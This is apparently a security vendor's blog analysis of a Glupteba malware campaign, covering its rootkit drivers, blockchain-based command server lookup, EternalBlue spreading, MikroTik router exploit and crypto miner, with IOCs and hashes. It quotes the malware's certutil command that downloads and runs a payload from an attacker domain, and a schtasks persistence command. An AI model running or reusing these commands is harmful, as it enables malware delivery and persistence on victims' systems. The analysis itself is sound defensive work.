As we have written about before, cybercriminals will look to exploit vulnerabilities in all types of equipment, including VPNs, routers, and more.
One such campaign that emerged in the latter part of 2019 used the Glupteba malware to drop cryptocurrency miners on victims' machines. It exploited vulnerabilities in MikroTik routers and used the EternalBlue exploit to propagate laterally. We recently observed a similar attack in our logs. In this blog, we will focus on the various components of this recent attack.
Glupteba Trojan
Although the Glupteba Trojan is classified as a dropper, it has the ability to steal information from infected systems. In addition, it uses lateral propagation to spread over the network, has the capability to install a miner, and can download a component that is able to control routers and relay traffic.
Furthermore, it seems that this malware is under active development, and its creators are employing dangerous and rarely used techniques to keep their creation active.
The capabilities of this malware include:
Escalation of privileges
Persistence
Rootkit drivers
Data exfiltration
Botnet commands
Lateral propagation
Router exploit
XMRig Miner
The initial file is custom packed, written in the Go programming language. The binary implements persistence by first copying itself to the Windows directory with a name that mimics the system processes. After that, it starts Task Scheduler to schedule the executable to run periodically with the highest privileges and downloads the latest binary by using "certutil".
cmd.exe /C certutil.exe -urlcache -split -f https://hotgifts[.]online/app/app.exe
C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe &&
C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe /31340
C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR
C:\Windows\rss\csrss.exe' /TN csrss /F
It also creates a registry key in HKEY_USERS\\Software\Microsoft\b3644142 to store configuration data.
Once persistence is established, the malware verifies whether it's running as an administrator account or not. If not, it performs a UAC bypass by using a fodhelper method to get it elevated. It uses Run as a trusted installer method to run the process under the SYSTEM user. Running with excess privileges, such as system-level, lets the threat actor gain stronger control of the infected machine and, potentially, the network.
Embedded modules
The binary has embedded executables and rootkit drivers used for hiding files and processes, including:
Winmon.sys
Winmonfs.sys
WinmonProcessMonitor.sys
Patch.exe
DSEFix.exe
Winmox.sys hides the running processes of the malware.
Winmonfs.sys hides the malware utilities and directories created by the malware.
WinmonProcessMonitor.sys monitors and terminates processes related to security vendors.
After that, the malware executes the embedded executable patch.exe to bypass existing security controls. It is the modified version of the Universal PatchGuard and Driver Signature Enforcement Disable (UPGDSED) utility.
Patch.exe drops the malicious drivers files at %WINDIR%\system32\drivers and registers them as active drivers during the next reboot with bcedit.exe.
The malware then executes the embedded DSEFix.exe, an open-source tool, to bypass Microsoft driver verification to install its own drivers.
Backdoor commands
This malware updates its command-and-control (C&C) server address through the blockchain. It enumerates the publicly available Electrum Bitcoin wallet server and queries the blockchain hash history.
It has a hardcoded wallet address 1CgPCp3E9399ZFodMnTSSvaf5TpGiym2N1. It queries the transaction of this address and gets the hash with the OP_RETURN instruction.
Figure 1: The OP_RETURN hash
This data gets decrypted by AES with the hardcoded key 6B2A9E4E0B5D621263FCB7B50745A9879C2D4AB34C807ED03061B66E04336663. The decryption of the data leads to the C&C address of malware hotgifts[.]online.
This malware also gets commands from the C&C server and acts accordingly. Backdoor functions that are included in the binary are shown in Figure 2.
Figure 2: Backdoor functions
Lateral movement
This malware uses the EternalBlue exploit for lateral propagation by implanting the DoublePulsar backdoor on the victims' machines. It tries to spread locally onto the intranet by scanning for open port 445. It then launches the EternalBlue exploit into the vulnerable machine, which injects the same payload into one of the legitimate processes of the target machine.
Figure 3: The parsing of the EternalBlue and DoublePulsar config and launching attack
MikroTik router exploit
The malware downloads a component named winboxscan.exe from the URL cloudcast[.]best/9ce48261497d2b08c2752593410ce6ab/winboxscan.exe. The component winboxscan.exe scans randomly generated IP ranges for vulnerable MicroTik routers to exploit an RCE vulnerability (CVE-2018-14847).
The RCE vulnerability, a directory traversal vulnerability in the WinBox interface, allows unauthenticated remote attackers to read arbitrary files and remote authenticated attackers to write arbitrary files.
This component first generates random IP ranges, passing it to the attacker module which tries to connect those IPs on port 8291.
Figure 4: The malware generates IP for scanning
After a successful connection, it attempts to exploit a MicroTik router that has a RouterOS system with the CVE-2018-14847 vulnerability.
Figure 5: The CVE-2018-14847 exploit
This vulnerability allows the attacker to get the credentials from unpatched routers. After getting the credentials, this component adds a scheduler task that checks the C&C server and executes the content downloaded from it to a compromised MicroTik router.
XMRig miner
In addition to the router exploit, this malware downloads a mining configuration and mining agent, which are compiled with an open-source XMRig miner.
For miner traffic, it resolves a domain name premiumprice[.]shop, which has multiple IP addresses.
Figure 6: IP addresses for the miner traffic
It sends miner traffic to one of the IP addresses of the aforementioned domain.
Figure 7: The XMRig miner traffic
Coverage
The observed indicators in this attack were successfully blocked by the Zscaler Cloud Sandbox service.
Figure 8: The Zscaler Cloud Sandbox report
In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels.
The following is the Advanced Threat Protection signature released for detecting the malware:Win32.Trojan.Glupteba
And the following are the Cloud IPS (non-web) signatures that enable detection of the MikroTik exploit, EternalBlue, DoublePulsar and Miner coverage:IoT.Exploit.CVE-2018-14847.MikroTik Win32.Exploit.EternalblueWin32.Backdoor.DoublePulsarWin32.Coinminer.Xmrig
Conclusion
We have been observing complex attacks in this Glupteba campaign. The threat actors are leveraging non-web channels to exfiltrate data, propagate laterally, and exploit devices. To defend against threats on non-web channels, we recommend the use of a strong outbound firewall and IPS for prevention.
MITRE ATT&CK™ tactic and technique mapping
Tactic
Technique
Execution
Scheduled Task (T1053), Service Execution (T1035)
Command-Line Interface (T1059)
Persistence
Registry Run Key / Startup Folder (T1060), Hidden Files and Directories (T1158)
New Service (T1050), Kernel Modules and Extensions (T1215)
Privilege Escalation
Bypass User Account Control (T1088)
Defense Evasion
Bypass User Account Control (T1088), Disabling Security Tools (T1089),
File and Hidden Files and Directories (T1158), File Deletion (T1107),
Process Injection (T1055), Software Packing (T1045),
Rootkit (T1014), Modify Registry (T1112)
Discovery
System Owner/User Discovery (T1033), Security Software Discovery (T1063),
Virtualization/Sandbox Evasion (T1497), Network Service Scanning (T1046)
Lateral Movement
Exploitation of Remote Services (T1210)
Command & Control
Multi-Stage Channels (T1104), Commonly Used Port (T1043)
Exfiltration
Data Encrypted (T1022)
IOCs
hotgifts[.]online
deepsound[.]live
sndvoices[.]com
2makestorage[.]com
cloudcast[.]best/9ce48261497d2b08c2752593410ce6ab/winboxscan.exe
hotgifts[.]online/app/app.exe
XMRig miner proxies:
136[.]243[.]231[.]21
136[.]243[.]231[.]22
136[.]243[.]231[.]23
136[.]243[.]231[.]24
136[.]243[.]231[.]25
136[.]243[.]209[.]11
136[.]243[.]209[.]12
136[.]243[.]209[.]13
136[.]243[.]209[.]14
5[.]9[.]163[.]18
5[.]9[.]163[.]19
Hashes:
7A60CEAE6B783065A5EB14CADE2EDD83 (main packed)
1DCC2D31214DF73F53F58CFA5002B393 (main packed)
980D38465D1ED1F50DFF45D142493E59 (main unpacked)
563CA2240D1F9F5CA8B08E8BE9F2AA1D (winboxscan packed)
13C705F5CFE274223E48ADE3B7CF0285 (winboxscan unpacked)
0960D00F9971B8003E4BC193737F256E (windefender.exe)
13AAAFE14EB60D6A718230E82C671D57 (patch.exe)
D98E78FD57DB58A11F880B45BB659767 (dsefix.exe)
69989105F151015C16A2F422F5722590 (winmon.sys)
C6100C067D1E619B730BF23AB4045B17 (winmonFS.sys)
290389E59CA9FE99CE1779F41F26D645 (winmonProcessMonitor.sys)
↧